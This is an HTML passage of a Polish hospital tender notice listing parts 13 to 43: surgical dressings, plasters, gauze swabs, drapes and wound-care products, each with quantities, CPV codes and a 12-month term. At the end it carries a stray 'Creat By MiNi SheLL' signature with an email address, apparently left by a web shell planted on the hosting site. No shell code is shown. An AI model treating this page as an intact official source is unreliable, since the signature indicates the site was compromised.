<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> HYPOALERGICZNY, SAMOPRZYLEPNY OPATRUNEK POOPERACYJNY, NA PODŁOŻU Z ROZCIĄGLIWEJ WŁÓKNINY, Z WARSTWĄ CHŁONNĄ, JAŁOWY, PAKOWANY POJEDYŃCZO wym 10cm*10 cm	szt.	12 500.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> HYPOALERGICZNY, SAMOPRZYLEPNY OPATRUNEK POOPERACYJNY, NA PODŁOŻU Z ROZCIĄGLIWEJ WŁÓKNINY, Z WARSTWĄ CHŁONNĄ, JAŁOWY, PAKOWANY POJEDYŃCZO wym 10cm*10 cm	szt.	12 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> HYPOALERGICZNY, SAMOPRZYLEPNY OPATRUNEK POOPERACYJNY, NA PODŁOŻU Z ROZCIĄGLIWEJ WŁÓKNINY, Z WARSTWĄ CHŁONNĄ, JAŁOWY,  PAKOWANY POJEDYŃCZO  wym 10cm*15cm	szt.	8 700.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> HYPOALERGICZNY, SAMOPRZYLEPNY OPATRUNEK POOPERACYJNY, NA PODŁOŻU Z ROZCIĄGLIWEJ WŁÓKNINY, Z WARSTWĄ CHŁONNĄ, JAŁOWY,  PAKOWANY POJEDYŃCZO  wym 10cm*15cm	szt.	8 700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> HYPOALERGICZNY, SAMOPRZYLEPNY OPATRUNEK POOPERACYJNY, NA PODŁOŻU Z ROZCIĄGLIWEJ WŁÓKNINY, Z WARSTWĄ CHŁONNĄ,,JAŁOWY, PAKOWANY POJEDYŃCZO  wym 10cm*20cm   	szt.	8 700.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> HYPOALERGICZNY, SAMOPRZYLEPNY OPATRUNEK POOPERACYJNY, NA PODŁOŻU Z ROZCIĄGLIWEJ WŁÓKNINY, Z WARSTWĄ CHŁONNĄ,,JAŁOWY, PAKOWANY POJEDYŃCZO  wym 10cm*20cm   	szt.	8 700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> HYPOALERGICZNY, SAMOPRZYLEPNY OPATRUNEK POOPERACYJNY, NA PODŁOŻU Z ROZCIĄGLIWEJ WŁÓKNINY, Z WARSTWĄ CHŁONNĄ,, JAŁOWY,  PAKOWANY POJEDYŃCZO wym 10cm*25cm   	szt.	12 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> HYPOALERGICZNY, SAMOPRZYLEPNY OPATRUNEK POOPERACYJNY, NA PODŁOŻU Z ROZCIĄGLIWEJ WŁÓKNINY, Z WARSTWĄ CHŁONNĄ,, JAŁOWY,  PAKOWANY POJEDYŃCZO wym 10cm*25cm   	szt.	12 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> PRZYLEPIEC HYPOALERGICZNY NA  WŁOKNINIE, ELASTYCZNY, MIĘKKI,  Z ŁATWO ODDZIELAJĄCYM SIĘ PAPIEREM ZABEZPIECZAJĄCYM  szer.10cm 	mb	700.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZYLEPIEC HYPOALERGICZNY NA  WŁOKNINIE, ELASTYCZNY, MIĘKKI,  Z ŁATWO ODDZIELAJĄCYM SIĘ PAPIEREM ZABEZPIECZAJĄCYM  szer.10cm 	mb	700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> PRZYLEPIEC HYPOALERGICZNY NA  WŁOKNINIE, ELASTYCZNY LUB PÓŁELASTYCZNY , MIĘKKI,  BEZ PAPIERU PODKŁADOWEGO , NA ROLCE , Z PIONOWĄ PERFORACJĄ DLA ŁATWEGO DZIELENIA  szer.10cm 	mb	10 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZYLEPIEC HYPOALERGICZNY NA  WŁOKNINIE, ELASTYCZNY LUB PÓŁELASTYCZNY , MIĘKKI,  BEZ PAPIERU PODKŁADOWEGO , NA ROLCE , Z PIONOWĄ PERFORACJĄ DLA ŁATWEGO DZIELENIA  szer.10cm 	mb	10 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> PRZYLEPIEC HYPOALERGICZNY NA  WŁÓKNINIE, ELASTYCZNY, MIĘKKI, Z ŁATWO ODDZIELAJĄCYM SIĘ PAPIEREM ZABEZPIECZAJĄCYM szer.15cm 	mb	500.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZYLEPIEC HYPOALERGICZNY NA  WŁÓKNINIE, ELASTYCZNY, MIĘKKI, Z ŁATWO ODDZIELAJĄCYM SIĘ PAPIEREM ZABEZPIECZAJĄCYM szer.15cm 	mb	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> PRZYLEPIEC HYPOALERGICZNY NA  WŁÓKNINIE, ELASTYCZNY LUB PÓŁELASTYCZNY , MIĘKKI,  BEZ PAPIERU PODKŁADOWEGO , NA ROLCE , Z PIONOWĄ PERFORACJĄ DLA ŁATWEGO DZIELENIA  szer.15cm 	mb	550.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZYLEPIEC HYPOALERGICZNY NA  WŁÓKNINIE, ELASTYCZNY LUB PÓŁELASTYCZNY , MIĘKKI,  BEZ PAPIERU PODKŁADOWEGO , NA ROLCE , Z PIONOWĄ PERFORACJĄ DLA ŁATWEGO DZIELENIA  szer.15cm 	mb	550.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> PRZYLEPIEC HYPOALERGICZNY NA  WŁÓKNINIE, ELASTYCZNY, MIĘKKI,  Z ŁATWO ODDZIELAJĄCYM SIĘ PAPIEREM ZABEZPIECZAJĄCYM    szer.20cm 	mb	500.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZYLEPIEC HYPOALERGICZNY NA  WŁÓKNINIE, ELASTYCZNY, MIĘKKI,  Z ŁATWO ODDZIELAJĄCYM SIĘ PAPIEREM ZABEZPIECZAJĄCYM    szer.20cm 	mb	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> PRZYLEPIEC HYPOALERGICZNY NA  WŁOKNINIE, ELASTYCZNY LUB PÓŁELASTYCZNY , MIĘKKI,  BEZ PAPIERU PODKŁADOWEGO , NA ROLCE , Z PIONOWĄ PERFORACJĄ DLA ŁATWEGO DZIELENIA  szer.20cm	mb	600.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZYLEPIEC HYPOALERGICZNY NA  WŁOKNINIE, ELASTYCZNY LUB PÓŁELASTYCZNY , MIĘKKI,  BEZ PAPIERU PODKŁADOWEGO , NA ROLCE , Z PIONOWĄ PERFORACJĄ DLA ŁATWEGO DZIELENIA  szer.20cm	mb	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> PRZYLEPIEC HYPOALERGICZNY NA  JEDWABIU, ROZRYWALNY BEZ UŻYCIA NOŻYCZEK  Szer. 25 mm	mb	31 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZYLEPIEC HYPOALERGICZNY NA  JEDWABIU, ROZRYWALNY BEZ UŻYCIA NOŻYCZEK  Szer. 25 mm	mb	31 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> PRZYLEPIEC HYPOALERGICZNY NA WŁÓKNINIE, MIĘKKI, DOBRZE DOPASOWUJĄCY SIĘ DO KSZTAŁTÓW CIAŁA, ROZRYWALNY BEZ UŻYCIA NOŻYCZEK szer.25  mm 	mb	36 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZYLEPIEC HYPOALERGICZNY NA WŁÓKNINIE, MIĘKKI, DOBRZE DOPASOWUJĄCY SIĘ DO KSZTAŁTÓW CIAŁA, ROZRYWALNY BEZ UŻYCIA NOŻYCZEK szer.25  mm 	mb	36 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> PRZYLEPIEC HYPOALERGICZNY NA WŁÓKNINIE, MIĘKKI, DOBRZE DOPASOWUJĄCY SIĘ DO KSZTAŁTÓW CIAŁA, ROZRYWALNY BEZ UŻYCIA NOŻYCZEK , ŁATWY  DO DZIELENIA  WZDŁUŻ I W POPRZEK ,ŁATWA APLIKACJA  NAWET W RĘKAWICZKACH szer.25  mm 	mb	9 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZYLEPIEC HYPOALERGICZNY NA WŁÓKNINIE, MIĘKKI, DOBRZE DOPASOWUJĄCY SIĘ DO KSZTAŁTÓW CIAŁA, ROZRYWALNY BEZ UŻYCIA NOŻYCZEK , ŁATWY  DO DZIELENIA  WZDŁUŻ I W POPRZEK ,ŁATWA APLIKACJA  NAWET W RĘKAWICZKACH szer.25  mm 	mb	9 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> PRZYLEPIEC Z OPATRUNKIEM NA WŁÓKNINIE, HYPOALERGICZNY szer. 8cm	mb	600.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZYLEPIEC Z OPATRUNKIEM NA WŁÓKNINIE, HYPOALERGICZNY szer. 8cm	mb	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> SIATKA ELASTYCZNA OPATRUNKOWA na podudzie dorosłego 	mb	1 200.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SIATKA ELASTYCZNA OPATRUNKOWA na podudzie dorosłego 	mb	1 200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> SIATKA ELASTYCZNA OPATRUNKOWA na ramię dorosłego 	mb	2 800.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SIATKA ELASTYCZNA OPATRUNKOWA na ramię dorosłego 	mb	2 800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> SERWETA   OPERACYJNA   wym 45*45cm  4 warst ze znacznikiem radiacyjnym i tasiemką   WYMAGANE SERWETY NIE PRANE 	szt.	20 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SERWETA   OPERACYJNA   wym 45*45cm  4 warst ze znacznikiem radiacyjnym i tasiemką   WYMAGANE SERWETY NIE PRANE 	szt.	20 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> TAMPONY GINEKOLOGICZNE NORMAL LUB STANDARD LUB REGULR	szt.	2 400.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TAMPONY GINEKOLOGICZNE NORMAL LUB STANDARD LUB REGULR	szt.	2 400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.77.11.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> TUPFERY GAZOWE KULE 20 *20cm	szt.	1 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TUPFERY GAZOWE KULE 20 *20cm	szt.	1 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> TUPFERY   GAZOWE  KULE 20*20cm  ze znacznikiem radiacyjnym      	szt.	4 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TUPFERY   GAZOWE  KULE 20*20cm  ze znacznikiem radiacyjnym      	szt.	4 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> TUPFERY  GAZOWE FASOLA 12*12cm
(Dopuszczono tupfery w kształcie kuli)	szt.	6 000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TUPFERY  GAZOWE FASOLA 12*12cm
(Dopuszczono tupfery w kształcie kuli)	szt.	6 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> WATA  OPATRUNKOWA BAWEŁNIANO-WISKOZOWA 	kg	20.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> WATA  OPATRUNKOWA BAWEŁNIANO-WISKOZOWA 	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> FOLIA  OPERACYJNA samoprzylepna o wym.całkowitym 40*42 cm	szt.	60.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> FOLIA  OPERACYJNA samoprzylepna o wym.całkowitym 40*42 cm	szt.	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> OPATRUNEK  HYDROKOLOIDOWY  o  wym.  10 x 10 cm 	szt.	80.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPATRUNEK  HYDROKOLOIDOWY  o  wym.  10 x 10 cm 	szt.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 37 <b>NAZWA:</b> OPATRUNEK  HYDROKOLOIDOWY  o  wym. 15 x 15 cm	szt.	80.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPATRUNEK  HYDROKOLOIDOWY  o  wym. 15 x 15 cm	szt.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 38 <b>NAZWA:</b> OPATRUNEK  HYDROKOLOIDOWY  typu  THIN  o  wym. 10 x 10 cm	szt.	80.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPATRUNEK  HYDROKOLOIDOWY  typu  THIN  o  wym. 10 x 10 cm	szt.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 39 <b>NAZWA:</b> OPATRUNEK  HYDROKOLOIDOWY  typu  THIN  o  wym. 15 x 15 cm	szt.	40.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPATRUNEK  HYDROKOLOIDOWY  typu  THIN  o  wym. 15 x 15 cm	szt.	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 40 <b>NAZWA:</b> OPATRUNEK  HYDROŻELOWY  o  wym. 10 x 10 cm	szt.	40.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPATRUNEK  HYDROŻELOWY  o  wym. 10 x 10 cm	szt.	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 41 <b>NAZWA:</b> OPATRUNEK  DLA  RAN  WYMAGAJĄCYCH  AKTYWNEGO  OCZYSZCZENIA  zmiana  min.  Co  24  godz.  o  wym. 10 x 10 cm	szt.	40.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPATRUNEK  DLA  RAN  WYMAGAJĄCYCH  AKTYWNEGO  OCZYSZCZENIA  zmiana  min.  Co  24  godz.  o  wym. 10 x 10 cm	szt.	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 42 <b>NAZWA:</b> KOMPRESY  JAŁOWE  ZE  SREBREM  IMPREGNOWANE  NEUTRALNĄ  MAŚCIĄ  o  wym.  10 x 20 cm	szt.	70.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KOMPRESY  JAŁOWE  ZE  SREBREM  IMPREGNOWANE  NEUTRALNĄ  MAŚCIĄ  o  wym.  10 x 20 cm	szt.	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 43 <b>NAZWA:</b> KOMPRESY  JAŁOWE  IMPREGNOWANE  NEUTRALNĄ  MAŚCIĄ  o  wym.  10 x 20 cm	szt.	80.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KOMPRESY  JAŁOWE  IMPREGNOWANE  NEUTRALNĄ  MAŚCIĄ  o  wym.  10 x 20 cm	szt.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com